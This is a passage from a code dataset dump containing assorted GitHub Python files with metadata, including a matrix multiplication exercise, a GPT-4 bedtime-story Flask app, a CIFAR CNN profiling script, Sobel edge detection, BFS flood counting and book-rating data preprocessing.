list:\n        raise TypeError(\"m_b must be a list\")\n    if type(m_a) is not list:\n        raise TypeError(\"m_a must be a list\")\n    if len(m_a) == 0 or len(m_b) == 0 or m_a == [[]] or m_b == [[]]:\n        raise ValueError(\"m_a can't be empty or m_b can't be empty\")\n\n    for row in m_a:\n        for i in row:\n            if not isinstance(i, (int, float)):\n                raise TypeError(\"m_a should contain only integers or floats\")\n        if len(row) != len(m_a[0]):\n            raise TypeError(\"each row of m_a must be of the same size\")\n        if len(row) != len(m_b):  # columns of m_a must match rows of m_b\n            raise ValueError(\"m_a and m_b can't be multiplied\")\n\n    for row in m_b:\n        for i in row:\n            if not isinstance(i, (int, float)):\n                raise TypeError(\"m_b should contain only integers or floats\")\n        if len(row) != len(m_b[0]):\n            raise TypeError(\"each row of m_b must be of the same size\")\n    n_matrix = []\n    i = 0\n    lists = []\n    for row1 in range(len(m_a)):\n        lists = []\n        for col1 in range(len(m_b[0])):  # one result entry per column of m_b\n            for element in range(len(m_a[0])):\n                i += m_a[row1][element] * m_b[element][col1]\n            lists.append(i)\n            i = 0\n        n_matrix.append(lists)\n    return 
n_matrix\n","repo_name":"Benonking/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/100-matrix_mul.py","file_name":"100-matrix_mul.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40738692345","text":"import os\n\nimport openai\nfrom flask import Flask, json, redirect, render_template, request, url_for\n\napp = Flask(__name__)\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\n@app.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n if request.method == \"POST\":\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=generate_story_prompt(\n request.form[\"main-character\"],\n request.form[\"second-character\"],\n request.form[\"theme\"],\n request.form[\"age\"],\n ),\n )\n result = json.loads(response.choices[0].message.content)\n for (i, chapter) in enumerate(result):\n print(\"Generating image for: \", chapter)\n\n response = openai.Image.create(\n prompt=chapter[\"img_prompt\"],\n n=1,\n size=\"1024x1024\"\n )\n img_url = response['data'][0]['url']\n result[i][\"img_url\"] = img_url\n print(\"result: \", result)\n return redirect(url_for(\"story\", chapter=1, data=json.dumps(result)))\n\n result = request.args.get(\"result\")\n img_result = request.args.get(\"img_result\")\n return render_template(\"index.html\", result=result, img_result=img_result)\n\n\n@ app.route(\"/story\", methods=[\"GET\"])\ndef story():\n data = json.jsonify(request.args.get(\"data\"))\n chapter = request.args.get(\"chapter\")\n return render_template(\"story.html\", chapter=chapter, data=data)\n\n\n@ app.route(\"/img\", methods=[\"POST\"])\ndef img():\n print(\"/img request json: \", request.json)\n if request.method == \"POST\":\n input = request.json[\"result\"]\n response = openai.Image.create(\n prompt=input,\n n=1,\n size=\"1024x1024\"\n )\n img_url = response['data'][0]['url']\n response = app.response_class(\n response=json.dumps({\"img_url\": img_url}),\n status=200,\n mimetype='application/json'\n )\n return response\n\n\ndef generate_story_prompt(main_character, second_character, theme, age):\n return [\n {\"role\": \"system\", \"content\": \"You are a story teller,\\\n that tells engaging bed time stories.\"},\n\n {\"role\": \"user\", \"content\":\n \"Tell me a bed time story with \" + main_character +\n \" as the main character and \" +\n second_character + \" as the second character.\\\n The story should be about \" + theme +\n \" and for someone who is \" + age + \" years old.\\\n Split it into 5 chapters and give a very detailed prompt\\\n for generating an image with DALLE for each chapter.\\\n The prompts should be related to each other and the story.\\\n The output should be a json in the following format:\\\n [{\\\"chapter\\\": 1, \\\"text\\\": \\\"the text of the chapter\\\",\\\n \\\"img_prompt\\\": \\\"The prompt for generating an image\\\" }, ...]\"\n },\n ]\n","repo_name":"thomsan/gpt4-bedtime-stories","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16445401869","text":"\"\"\" The file provides the network ip address, works with py 2 and 3. and need external package \"\"\"\nfrom netifaces import interfaces, ifaddresses, AF_INET\n\ndef get_ip_address(ifname):\n \"\"\" Method will provide the ip address for an interface. 
\"\"\"\n try:\n for ifaceName in interfaces():\n if ifaceName == ifname :\n addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )]\n return addresses[0]\n\n return 'Unable to find NIC.'\n\n except:\n return 'Unable to find IP(Execption).'\n\n\n# Test code.\n#ip = get_ip_address('eno1')\n#ip = get_ip_address('wlan0')\n#print (ip)\n","repo_name":"georgerahul/Ethernet-Ip-address-logger-for-linux","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20667281550","text":"#Defining a function that creates a tuple and then returns that tuple\ndef steps():\n likelihoods = [(\"step 1\", 50), (\"step 2\", 38), (\"step 3\", 27), (\"step 4\", 99), (\"step 5\", 4)]\n\n\n return likelihoods\n\n #Defining a function that first creates a local variable which will store the \"likelihood\" tuple\n\ndef run():\n\n #storing the likelihoods tuple in steps\n\n all_steps = steps()\n\n #Creating two empty lists\n\n good_steps = []\n bad_steps = []\n \n #A for loop that for every step in steps it will check if the step in the current position is equal or less to 50 if it is then it will be added to the bad steps list and if it isn't it will be added to the good steps list\n for step in all_steps:\n if (step[1] >= 50):\n bad_steps.append(step)\n else:\n good_steps.append(step) \n\n print(f\"Good steps: {len(good_steps)}, Bad steps: {len(bad_steps)}\")\n\nrun()\n","repo_name":"SaphiraFord/com411","sub_path":"data/tuples/nested_tuple.py","file_name":"nested_tuple.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30574473417","text":"from keras.datasets import cifar10\nfrom src.cnn_profiler import CNNProfiler\nfrom src.configs.network_configs.cifar.network_config_2 import NETWORK_STRUCTURE, NETWORK_ANCHOR, NETWORK_PATH, INIT, LEARNING_RATE\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom src.distribution import Distribution\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nX_train = X_train.astype(\"float32\")\nX_train /= 255\nX_test = X_test.astype(\"float32\")\nX_test /= 255\ncnn_profiler = CNNProfiler(NETWORK_STRUCTURE, network_anchor=NETWORK_ANCHOR, network_path=NETWORK_PATH, init=INIT, lr=LEARNING_RATE)\n################## Train ######################\ndef train():\n\n x = X_train.astype(\"float32\")\n print(X_train)\n y = y_train.reshape(-1)\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n cnn_profiler.train([None, 32, 32, 3], [None, 10], x, y, iter=6000)\n################## Test ########################\ndef test():\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n cnn_profiler.test([None, 32, 32, 3], [None, 10], x[:2000], y[:2000])\n################## Correct Vector ###################\ndef get_mid(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n mid = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x)\n return mid\ndef get_correct_mid(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n y = y[y == label]\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n print(y.shape)\n return cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], x, y)\n################# Pertubation Test ####################\ndef 
pertubation_test(label, pertubation):\n def pertubate_img(img, pertubation):\n img_p = np.array(img)\n img_p += pertubation\n img_p[img_p>1]=1\n img_p[img_p<0]=0\n return img_p\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x_ori = x[y == label][1]\n print(x_ori.shape)\n x_ptb = pertubate_img(x_ori,pertubation)\n # x_ptb = x[y == (label+1)][0]\n plt.subplot(211)\n plt.imshow( x_ori)\n plt.subplot(212)\n plt.imshow( x_ptb)\n # plt.show()\n cnn_profiler.test([None, 32, 32, 3], [None, 10], x_ptb)\n ori_vec = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x_ori)\n ptb_vec = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x_ptb)\n np.savetxt(\"profile/cifar/%s.txt\" % str(label)+\"_ori\", ori_vec, fmt=\"%.4f\")\n np.savetxt(\"profile/cifar/%s.txt\" % str(label)+\"_ptb\", ptb_vec, fmt=\"%.4f\")\n thres = 1e-2\n same = np.where(ori_vec-ptb_vec<=thres)\n diff = np.where(ori_vec-ptb_vec>=thres)\n print(same[1].shape, diff[1].shape)\n return diff[1]\n# final_diff = None\n# for i in range(-100,100,10):\n# print(i)\n# if i==0:\n# continue\n# diff = pertubation_test(6, i)\n# if final_diff is None:\n# final_diff = diff\n# else:\n# final_diff = np.intersect1d(final_diff, diff)\n# print(final_diff.shape)\n# print(final_diff)\n################# Gaussian Check ####################\ndef gaussian_check(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n n, p = cnn_profiler.gaussian_check([None, 32, 32, 3], [None, 10], x)\n thres=1e-3\n p_normal = np.where(p>thres)[0]\n print(p_normal)\n return p_normal\n################# Mahanobis Distance #################\ndef small_rate(data, range):\n data_in_range = data[data <= range]\n rate = len(data_in_range) / len(data)\n return rate\n\n\ndef test_m_distance(label):\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n y = y[y == label]\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n print(y)\n correct = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], x, y)\n distribute_correct = Distribution(correct)\n own_dis = []\n for i in range(correct.shape[0]):\n dis = distribute_correct.mahanobis_distance(correct[i])\n own_dis.append(dis)\n own_dis = np.array(own_dis)\n print(own_dis)\n print(own_dis.max())\n print(own_dis.mean())\n xx = X_test.astype(\"float32\")\n yy = y_test.reshape(-1)\n xx = xx[yy == label]\n yy = yy[yy == label]\n values = yy\n n_values = 10\n yy = np.eye(n_values)[values]\n correct_test = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], xx, yy)\n wrong_test = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], xx, yy, wrong=True)\n test_correct_dis = []\n for i in range(correct_test.shape[0]):\n dis = distribute_correct.mahanobis_distance(correct_test[i])\n test_correct_dis.append(dis)\n test_correct_dis = np.array(test_correct_dis)\n test_wrong_dis = []\n for i in range(wrong_test.shape[0]):\n dis = distribute_correct.mahanobis_distance(wrong_test[i])\n test_wrong_dis.append(dis)\n test_wrong_dis = np.array(test_wrong_dis)\n print(test_correct_dis)\n print(test_correct_dis.max())\n print(test_correct_dis.mean())\n print(test_wrong_dis)\n print(test_wrong_dis.max())\n print(test_wrong_dis.mean())\n x_another = X_train.astype(\"float32\")\n y_another = y_train.reshape(-1)\n x_another = x_another[y_another == label + 2]\n y_another = y_another[y_another == label + 2]\n mid = cnn_profiler.get_mid([None, 32, 32, 3], [None, 10], x_another)\n another_dis = []\n for i in range(mid.shape[0]):\n dis = 
distribute_correct.mahanobis_distance(mid[i])\n another_dis.append(dis)\n another_dis = np.array(another_dis)\n print(another_dis)\n print(another_dis.max())\n print(another_dis.mean())\n\ndef test_with_filter(label):\n anchor = -2\n filter = None\n x = X_train.astype(\"float32\")\n y = y_train.reshape(-1)\n x = x[y == label]\n y = y[y == label]\n values = y\n n_values = 10\n y = np.eye(n_values)[values]\n correct = cnn_profiler.get_correct_mid([None, 32, 32, 3], [None, 10], x, y, anchor=anchor, filter=filter)\n distribute_correct = Distribution(correct)\n own_dis = []\n for i in range(correct.shape[0]):\n dis = distribute_correct.mahanobis_distance(correct[i])\n own_dis.append(dis)\n own_dis = np.array(own_dis)\n # print(own_dis)\n print(own_dis.min())\n print(own_dis.max())\n print(own_dis.mean())\n x = X_test.astype(\"float32\")\n y = y_test.reshape(-1)\n x = x[y != label][:2000]\n y = y[y != label][:2000]\n wrong_test, pic = cnn_profiler.get_mid_by_label([None, 32, 32, 3], [None, 10], x, y, label, anchor=anchor, filter=filter)\n logits, pic = cnn_profiler.get_mid_by_label([None, 32, 32, 3], [None, 10], x, y, label, anchor=-1)\n pic = pic.reshape(32,32,3)\n plt.imshow(pic)\n plt.show()\n print(logits)\n test_wrong_dis = []\n for i in range(wrong_test.shape[0]):\n dis = distribute_correct.mahanobis_distance(wrong_test[i])\n test_wrong_dis.append(dis)\n test_wrong_dis = np.array(test_wrong_dis)\n # print(test_wrong_dis)\n print(test_wrong_dis)\n print(test_wrong_dis.min())\n print(test_wrong_dis.max())\n print(test_wrong_dis.mean())\n print(small_rate(test_wrong_dis,200))\ntest_with_filter(3)\n\n\n\n\n\n\n\n\n\n","repo_name":"luhc300/DeepDiff","sub_path":"src/cifar_test/cifar_test.py","file_name":"cifar_test.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"32934964640","text":"import time\n\n\n__version__ = \"$Id: timekeeper.py 25 2018-01-26 19:00:40Z lbusoni $\"\n\n\nclass TimeKeeper(object):\n\n def __init__(self, interval=1.0, timeMod=time):\n self.interval = interval\n # keep the injected time module so inc() uses it too\n self.timeMod = timeMod\n self.t0 = timeMod.time()\n self.cnt = 0\n\n def inc(self):\n self.cnt += 1\n t1 = self.timeMod.time()\n if (t1 - self.t0) >= self.interval:\n tdiff = t1 - self.t0\n self.rate = self.cnt / tdiff\n self.count = self.cnt\n self.ms = 1.0 / self.rate * 1e3\n self.cnt = 0\n self.t0 = t1\n return True\n return False\n","repo_name":"ArcetriAdaptiveOptics/plico","sub_path":"plico/utils/timekeeper.py","file_name":"timekeeper.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"36096344099","text":"# -*- coding:utf-8 -*-\nfrom src.Client.Conf.config import *\n\n\nclass EditMissionList():\n \"\"\"\n Responsible for editing missions; this class does the actual work\n \"\"\"\n def edit(self, list, missionId, bookName=None, missionRange=None, nextTime=None, state=None, loopTime=None,\n isFinish=None):\n \"\"\"\n Edit a mission\n :param list: the target list\n :param missionId: the mission id (string)\n :param bookName: the book name\n :param missionRange: the mission range\n :param nextTime: the next run time of the mission\n :param state: the mission state\n :param loopTime: the remaining iteration count\n :param isFinish: whether the mission is finished\n :return: the list after the edit\n \"\"\"\n # Back up the list first so we can return the last good state if the edit fails\n backupList = list[:]\n try:\n # Normalize the mission id (defensive programming)\n missionId = str(missionId).zfill(6)\n # Walk the mission list looking for the target mission\n for each in list:\n if each['missionId'] == missionId:\n # Update the target mission\n if bookName is not None:\n each['bookName'] = bookName\n if missionRange is not None:\n each['missionRange'] = missionRange\n if nextTime is not None:\n each['nextTime'] = 
nextTime\n if state is not None:\n each['state'] = state\n if loopTime is not None:\n each['loopTime'] = loopTime\n if isFinish is not None:\n each['isFinish'] = isFinish\n # Print a debug log entry\n if DEBUG and MISSION_DEBUG:\n print('{SYS}{MISSION_DEBUG} mission edited successfully, id is ' + missionId)\n\n return list\n except Exception as e:\n # Open the error log file\n wrongFile = open('data/wrongMessage.dat', 'a+')\n # Get the current time\n currentTime = str(datetime.datetime.strptime(time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime()),\n '%Y-%m-%d-%H-%M-%S'))\n # Build the error report\n wrongMessage = {\n '|currentTime': currentTime,\n '|file': 'MissionSystem-EditMission-editMissionList',\n '|list': list,\n '|missionId': missionId,\n '|bookName': bookName,\n '|missionRange': missionRange,\n '|nextTime': nextTime,\n '|state': state,\n '|loopTime': loopTime,\n '|isFinish': isFinish,\n '|wrongMessage': str(e)\n }\n # Write it to the file\n wrongFile.write(str(wrongMessage))\n # Append a newline\n wrongFile.write('\\n')\n wrongFile.close()\n return backupList\n\n","repo_name":"Sniper970119/MemoryAssistInPython","sub_path":"src/Client/MissionSystem/EditMission/tools/editMissionList.py","file_name":"editMissionList.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"34"}
{"seq_id":"35490063872","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom sklearn.preprocessing import scale\nfrom matplotlib import pyplot as plt\nfrom numpy import array, average\n\nwith open(\"wine.data\", \"r\") as f:\n data = f.read().splitlines()\n\nlabels = []\nfeatures = []\n\nfor record in data:\n labels.append(record.split(',')[0])\n features.append(record.split(',')[1:])\n\nfeatures = array(features).astype('float')\nfeatures_scaled = array(scale(features)).astype('float')\nlabels = array(labels).astype('float')\n\n#trainX, testX, trainY, testY = train_test_split(features, labels, test_size=0.25)\ncv_scores = []\nfor k in range(1, 51):\n knn = KNeighborsClassifier(n_neighbors=k)\n kf = KFold(n_splits=5, shuffle=True, random_state=42)\n scores = cross_val_score(knn, features, labels, cv=kf, scoring='accuracy')\n cv_scores.append(scores.mean())\n \nplt.plot(list(range(1, 51)), cv_scores)\na = max(cv_scores)\nb = cv_scores.index(max(cv_scores)) + 1\nprint(a, b)\n\nwith open('file', \"w\") as f:\n #f.write(\"{}\".format(round(a, 2)))\n f.write(\"{}\".format(b))\n\nplt.show()\n","repo_name":"nik31096/coursera_intro_ml","sub_path":"coursera_yandex_hse/coursera_ml_knn_wine.py","file_name":"coursera_ml_knn_wine.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"13876928003","text":"import math\nfrom PIL import Image\n\nfrom cinza import cinza\n\nVERTICAL_KERNEL = [\n [1, 2, 1],\n [0, 0, 0],\n [-1, -2, -1]\n]\nHORIZONTAL_KERNEL = [\n [-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]\n]\n\n# Convert the image to grayscale\nimg = cinza(Image.open(\"./img/baloes.jpg\"))\nimg_width = img.width\nimg_height = img.height\n\n# Output image\noutput_img = Image.new(\"L\", (img_width, img_height))\n\n\ndef get_modified_pixel(x, y, dir_kernel, offset=0):\n acc = 0\n\n # Getting window pixels\n for i, k in enumerate(range(x - 1, x + 2)):\n for j, m in enumerate(range(y - 1, y + 2)):\n if k < 0 or m < 0 or k >= img_width or m >= img_height:\n continue\n\n # Getting kernel value in current position\n cur_kernel_value = dir_kernel[i][j]\n \n if 
cur_kernel_value == 0:\n continue\n\n pixel = img.getpixel((k, m))[0]\n\n result = pixel * cur_kernel_value\n\n acc += result\n\n return acc\n\n\nfor x in range(img_width):\n for y in range(img_height):\n # Horizontal edges\n gx = get_modified_pixel(x, y, HORIZONTAL_KERNEL)\n # Vertical edges\n gy = get_modified_pixel(x, y, VERTICAL_KERNEL)\n\n g = int(math.sqrt(gx ** 2 + gy ** 2))\n\n output_img.putpixel((x, y), g)\n\noutput_img.save(\"./img/resultado.jpg\")\n\n# x - 1, y - 1 || x - 1, y || x - 1, y + 1\n# x, y - 1 || x, y || x, y + 1\n# x + 1, y - 1 || x + 1, y || x + 1, y + 1","repo_name":"AlexdeJesusFS/APS--Processamento-de-Imagem","sub_path":"Project/deteccao_bordas.py","file_name":"deteccao_bordas.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2601082845","text":"#!/usr/bin/env python\n# -*- coding: iso-8859-1 -*-\n\nfrom setuptools import setup, find_packages\n\nPACKAGE = 'TracUnixGroups'\nVERSION = '0.11'\n\nsetup(\n name = PACKAGE,\n version = VERSION,\n\n packages = find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data = True,\n\n author = \"Vadim Zaliva\",\n author_email = \"lord@crocodile.org\",\n description = \"TracUnixGroups - use system group membership in trac.\",\n long_description = \"The TracUnixGroups plugin allows Trac to use the\" \\\n \" OS group membership for permissions assignment.\",\n license = \"BSD\",\n keywords = \"trac group permission plugin\",\n url = \"http://trac-hacks.org/wiki/TracUnixGroupsPlugin\",\n\n entry_points = {\n 'trac.plugins': [\n '%s = %s' % (PACKAGE, 'unixgroups')\n ],\n },\n\n zip_safe = True\n)\n","repo_name":"woochica/trachacks","sub_path":"tracunixgroupsplugin/anyrelease/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24476544694","text":"from collections import deque\n\nN = int(input())\nboard = []\nfor _ in range(N):\n board.append(list(map(int, input().split())))\n\nwater_height = 0\nresult = 0\n\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0 ,0]\n\ndef bfs(pos, visited):\n global water_height\n x, y = pos\n q = deque()\n q.append((x, y))\n visited[x][y] = True\n while q:\n x, y = q.popleft()\n for i in range(4):\n ax = x + dx[i]\n ay = y + dy[i]\n if 0<=ax water_height and not visited[ax][ay]:\n visited[ax][ay] = True\n q.append((ax, ay))\n\n\nq = deque()\nwhile True:\n visited = [[False for _ in range(N)] for _ in range(N)]\n count = 0\n for i in range(N):\n for j in range(N):\n if board[i][j] > water_height and not visited[i][j]:\n bfs((i, j), visited)\n count += 1\n if count > result:\n result = count\n if count == 0:\n break \n water_height += 1\n \n \nprint(result)","repo_name":"HOYE0NG/algorithm","sub_path":"BFS+DFS/boj2468.py","file_name":"boj2468.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13135079803","text":"class Solution(object):\n def isIsomorphic(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n else:\n i = 0\n ref_dict = {}\n isomorphic_str = \"\"\n while i < len(s):\n if s[i] in ref_dict:\n isomorphic_str += ref_dict[s[i]]\n elif t[i] in ref_dict.values():\n isomorphic_str += s[i]\n else:\n ref_dict[s[i]] = t[i]\n isomorphic_str += ref_dict[s[i]]\n i += 1\n return True if 
isomorphic_str == t else False \n","repo_name":"amoghlale/Leetcode","sub_path":"Solutions/IsomorphicStrings.py","file_name":"IsomorphicStrings.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3263576040","text":"from pathlib import Path\n\nimport click\nimport pandas as pd\n\n\ndef read_books(path=\"data/01_raw/books_data.csv\"):\n books = pd.read_csv(path)\n return books\n\n\ndef read_ratings(path=\"data/01_raw/Books_rating.csv\"):\n ratings = pd.read_csv(path)\n return ratings\n\n\ndef filter_data(\n ratings,\n books,\n remove_no_description=True,\n remove_no_publisher=True,\n remove_no_author=True,\n remove_no_title=True,\n remove_no_category=True,\n):\n if remove_no_description:\n books = books[books[\"description\"].notna()]\n if remove_no_publisher:\n books = books[books[\"publisher\"].notna()]\n if remove_no_author:\n books = books[books[\"authors\"].notna()]\n if remove_no_title:\n books = books[books[\"Title\"].notna()]\n if remove_no_category:\n books = books[books[\"categories\"].notna()]\n books = books.join(\n ratings[[\"Id\", \"Title\"]].drop_duplicates().set_index(\"Title\"),\n on=\"Title\",\n how=\"inner\",\n )\n ratings = ratings[ratings[\"User_id\"].notna()]\n\n books = books[books[\"Title\"].isin(ratings[\"Title\"])]\n ratings = ratings[ratings[\"Title\"].isin(books[\"Title\"])]\n books = books[books[\"Id\"].isin(ratings[\"Id\"])]\n ratings = ratings[ratings[\"Id\"].isin(books[\"Id\"])]\n return ratings, books\n\n\ndef split_data_by_books(\n ratings, books, train=0.7, validation=0.2, test=0.1, seed=42, fraction=1.0\n):\n if abs(1 - (train + validation + test)) > 1e-5:\n raise ValueError(\"Train, validation and test sizes must sum to 1\")\n ratings = ratings[[\"Id\", \"User_id\", \"review/score\"]]\n ratings = ratings.rename(\n columns={\"Id\": \"book_id\", \"User_id\": \"user_id\", \"review/score\": \"score\"}\n )\n books = books[\n [\"Id\", \"Title\", \"authors\", \"description\", \"publisher\", \"categories\", \"image\"]\n ]\n books = books.rename(\n columns={\n \"Id\": \"book_id\",\n \"Title\": \"title\",\n \"authors\": \"authors\",\n \"description\": \"description\",\n \"publisher\": \"publisher\",\n \"categories\": \"categories\",\n \"image\": \"image_url\",\n }\n )\n books = books.sample(frac=fraction, random_state=seed)\n train_size = int(len(books) * train)\n validation_size = int(len(books) * validation)\n train_books = books[:train_size]\n validation_books = books[train_size : train_size + validation_size]\n test_books = books[train_size + validation_size :]\n train_ratings = ratings[ratings[\"book_id\"].isin(train_books[\"book_id\"])]\n validation_ratings = ratings[ratings[\"book_id\"].isin(validation_books[\"book_id\"])]\n test_ratings = ratings[ratings[\"book_id\"].isin(test_books[\"book_id\"])]\n return (\n train_ratings,\n validation_ratings,\n test_ratings,\n train_books,\n validation_books,\n test_books,\n )\n\n\n@click.command()\n@click.option(\"--data_path\", default=\"data/01_raw/\")\n@click.option(\"--destination_path\", default=\"data/02_intermediate/\")\n@click.option(\"--ratings_file\", default=\"Books_rating.csv\")\n@click.option(\"--books_file\", default=\"books_data.csv\")\n@click.option(\"--dont_remove_description\", is_flag=True, default=False)\n@click.option(\"--dont_remove_publisher\", is_flag=True, default=False)\n@click.option(\"--dont_remove_author\", is_flag=True, default=False)\n@click.option(\"--dont_remove_title\", is_flag=True, 
default=False)\n@click.option(\"--dont_remove_category\", is_flag=True, default=False)\n@click.option(\"--train\", default=0.7)\n@click.option(\"--validation\", default=0.2)\n@click.option(\"--test\", default=0.1)\n@click.option(\"--verbose\", is_flag=True, default=False)\n@click.option(\"--fraction\", default=1.0)\n@click.option(\"--seed\", default=42)\ndef main(\n data_path,\n destination_path,\n ratings_file,\n books_file,\n dont_remove_description,\n dont_remove_publisher,\n dont_remove_author,\n dont_remove_title,\n dont_remove_category,\n train,\n validation,\n test,\n verbose,\n fraction,\n seed,\n):\n data_path = Path(data_path)\n if verbose:\n print(\"Reading data\")\n ratings = read_ratings(data_path / ratings_file)\n books = read_books(data_path / books_file)\n if verbose:\n print(\"Filtering data\")\n ratings, books = filter_data(\n ratings,\n books,\n remove_no_description=not dont_remove_description,\n remove_no_publisher=not dont_remove_publisher,\n remove_no_author=not dont_remove_author,\n remove_no_title=not dont_remove_title,\n remove_no_category=not dont_remove_category,\n )\n if verbose:\n print(\"Splitting data\")\n (\n train_ratings,\n validation_ratings,\n test_ratings,\n train_books,\n validation_books,\n test_books,\n ) = split_data_by_books(\n ratings,\n books,\n train=train,\n validation=validation,\n test=test,\n seed=seed,\n fraction=fraction,\n )\n if verbose:\n print(\"Saving data\")\n destination_path = Path(destination_path)\n train_ratings.to_csv(destination_path / \"train_ratings.csv\", index=False)\n validation_ratings.to_csv(destination_path / \"validation_ratings.csv\", index=False)\n test_ratings.to_csv(destination_path / \"test_ratings.csv\", index=False)\n train_books.to_csv(destination_path / \"train_books.csv\", index=False)\n validation_books.to_csv(destination_path / \"validation_books.csv\", index=False)\n test_books.to_csv(destination_path / \"test_books.csv\", index=False)\n if verbose:\n print(f\"train_ratings size: {len(train_ratings)}\")\n print(f\"validation_ratings size: {len(validation_ratings)}\")\n print(f\"test_ratings size: {len(test_ratings)}\")\n print(f\"train_books size: {len(train_books)}\")\n print(f\"validation_books size: {len(validation_books)}\")\n print(f\"test_books size: {len(test_books)}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jakub-Kucinski/amazon-books-coldstart","sub_path":"src/amazon_books_coldstart/data_preprocessing/pandas_preprocessing.py","file_name":"pandas_preprocessing.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23123972430","text":"from __future__ import absolute_import\n\n\nclass Send:\n def __init__(self, url, id, action, type, ins_id, config,floating_ip):\n self.url = url\n self.id = id\n self.action = action\n self.type = type\n self.ins_id = ins_id\n self.config = config\n self.floating_ip = floating_ip\n\n\nclass Recv:\n def __init__(self, json_id, ins_id, content):\n self.json_id = json_id \n self.ins_id = ins_id\n self.content = content\n\nsend_list = []\nrecv_list = []\nthread_list = []\n","repo_name":"wangjunxiao/SDNCloud","sub_path":"sdntestbed_source/sdntestbed/python/novaconsole-master/build/lib.linux-x86_64-2.7/novaconsole/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1331806340","text":"from pico2d import *\n\nTUK_WIDTH, 
TUK_HEIGHT = 800, 600\nopen_canvas(TUK_WIDTH, TUK_HEIGHT)\nTUK_ground = load_image('TUK_GROUND.png')\ncharacter = load_image('animation_sheet.png')\nhand = load_image('hand_arrow.png')\ndir_check = 0\nhand_x, hand_y, hand_check = [], [], []\n\ndef handle_events():\n global running\n global x, y\n events = get_events()\n for event in events:\n if event.type == SDL_QUIT:\n running = False\n elif event.type == SDL_MOUSEBUTTONDOWN:\n hand_x.append(event.x)\n hand_y.append(TUK_HEIGHT - 1 - event.y)\n if x > event.x:\n hand_check.append(1)\n else:\n hand_check.append(2)\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n running = False\n\nrunning = True\nx, y = TUK_WIDTH // 2, TUK_HEIGHT // 2\nframe, idx = 0, 0\nsave_x, save_y = x, y\n\nwhile running:\n clear_canvas()\n TUK_ground.draw(TUK_WIDTH // 2, TUK_HEIGHT // 2)\n for i in range(0, len(hand_check)):\n if hand_check[i] == 1 or hand_check[i] == 2:\n hand.draw(hand_x[i], hand_y[i])\n\n if len(hand_check) > 0:\n if hand_check[0] == 1:\n character.clip_draw(frame * 100, 100 * 0, 100, 100, x, y)\n elif hand_check[0] == 2:\n character.clip_draw(frame * 100, 100 * 1, 100, 100, x, 